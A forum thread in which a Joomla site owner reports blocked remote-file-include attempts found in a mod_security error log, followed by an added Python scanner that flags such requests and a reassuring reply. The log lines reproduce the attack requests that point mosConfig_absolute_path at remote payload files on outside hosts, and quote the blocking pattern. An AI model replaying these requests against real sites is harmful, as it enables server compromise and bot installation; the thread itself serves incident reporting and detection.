Suspected bot installer/ddos attempt. Please help

#1

I posted a request for support a day or two ago, but haven’t heard back. These log entries are from then, but this sort of thing has continued to show up in my error.log. Please read and offer any suggestions if someone would be so kind. I appreciate it very much. Excerpts from the support email follow:


I noticed that the Docman component was down in my Joomla site, so I checked the error logs. I believe that these items are possibly unrelated, but I don’t know. Unknown individuals tried to use a Joomla exploit in order to compromise http://benconley.net/cms.

My googling shows that this is an attempt to download and install an IRC relay server on my machine. Evidently the exploit targets a component I am not using. My Joomla installation has Register Globals emulation turned off, so I believe that this was a failed attempt. I just wanted to make you aware of it. I was unable to find any processes running that I did not recognize when I ran “top” from ssh.

Here are the URLs with the actual code to be executed by them, in text format. Thanks for taking the time to read this. I am a happy customer and think you’re doing a great job. Please let me know if this is the right way for me to have proceeded here. Info from logs and my searches follows:


http://mirckurdu.net/
http://asksevda.net/

http://mirckurdu.net/images/lol.txt
http://mirckurdu.net/images/v6.txt
http://asksevda.net/system/lol.txt
http://asksevda.net/system/v6.txt

FORUM THREAD REGARDING EXPLOIT
http://forum.joomla.org/index.php/topic,76654.0.html

[Thu Sep 21 14:03:15 2006] [error] [client 72.22.71.71] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at THE_REQUEST. [hostname "benconley.net"] [uri "/cms/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://asksevda.net/system/lol.txt?"]
[Thu Sep 21 14:03:18 2006] [error] [client 216.55.160.103] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at THE_REQUEST. [hostname "benconley.net"] [uri "/cms/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://mirckurdu.net/images/lol.txt?"]
[Thu Sep 21 14:03:30 2006] [error] [client 202.41.167.246] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at THE_REQUEST. [hostname "benconley.net"] [uri "/cms/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://65.254.61.51/~httpds/lol.txt?"]

BC Tech
Team Shocker
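As an added example (not from the original post, Joomla or mod_security), a small Python scanner for error.log entries in the format quoted above. It pulls out the two markers that make these requests a remote-file-include attempt: the register_globals override (`GLOBALS=`, `_REQUEST[...]`) and `mosConfig_absolute_path` pointed at a remote file, and lists the payload hosts. The log lines, client addresses and payload hosts in it are constructed placeholders, not the ones from the post.

```python
import re
from urllib.parse import parse_qs

# Constructed sample entries in the mod_security 1.x error.log format quoted in
# the post above; clients and payload hosts are RFC 5737 / .invalid placeholders.
SAMPLE_LOG = """\
[Thu Sep 21 14:03:15 2006] [error] [client 192.0.2.10] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at THE_REQUEST. [hostname "www.example.org"] [uri "/cms/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://payload.example.invalid/system/lol.txt?"]
[Thu Sep 21 14:03:30 2006] [error] [client 192.0.2.20] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at THE_REQUEST. [hostname "www.example.org"] [uri "/cms/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://198.51.100.7/~user/lol.txt?"]
[Thu Sep 21 14:05:02 2006] [error] [client 192.0.2.30] File does not exist: /var/www/cms/favicon.ico
"""

# One "Access denied" entry; curly quotes are accepted because forum copy-paste
# often converts the straight quotes mod_security actually writes.
DENIED_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<client>[^\]]+)\] mod_security: '
    r'Access denied with code (?P<code>\d+)\..*?'
    r'\[hostname ["\u201c](?P<vhost>[^"\u201d]+)["\u201d]\] \[uri ["\u201c](?P<uri>.*?)["\u201d]\]'
)
REMOTE_RE = re.compile(r'^(?:https?|ftp)://([^/?#]+)', re.I)

def classify(entry):
    """Flag a register_globals override (GLOBALS / _REQUEST[...] keys) and any
    parameter pointed at a remote URL; None when neither marker is present."""
    path, _, query = entry["uri"].partition("?")
    params = parse_qs(query, keep_blank_values=True)
    globals_poisoning = any(k == "GLOBALS" or k.startswith("_REQUEST[") for k in params)
    remote = {}                      # parameter name -> remote host it points at
    for key, values in params.items():
        for v in values:
            m = REMOTE_RE.match(v)
            if m:
                remote[key] = m.group(1).lower()
    if not globals_poisoning and not remote:
        return None
    return {"ts": entry["ts"], "client": entry["client"], "vhost": entry["vhost"],
            "path": path, "globals_poisoning": globals_poisoning,
            "remote_includes": remote}

def scan(log_text):
    """Parse every mod_security denial in the log and keep the RFI hits."""
    hits = []
    for line in log_text.splitlines():
        m = DENIED_RE.match(line)
        if m and (hit := classify(m.groupdict())):
            hits.append(hit)
    return hits

def payload_hosts(hits):
    """Distinct hosts the attacker tried to include from (egress-filter / IOC list)."""
    return sorted({h for hit in hits for h in hit["remote_includes"].values()})
```

Running `scan(SAMPLE_LOG)` on the constructed log yields two hits and skips the unrelated "File does not exist" line; `payload_hosts` is the list worth checking against outbound connections from the web server, since a successful include would have fetched from exactly those hosts.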


#2

I think you did all the right things to establish that the exploit attempt failed. This is yet another example of why keeping updated is important.

–rlparker


#3

Thanks a lot for the prompt response. You’ve helped to put me at ease.

BC Tech
Team Shocker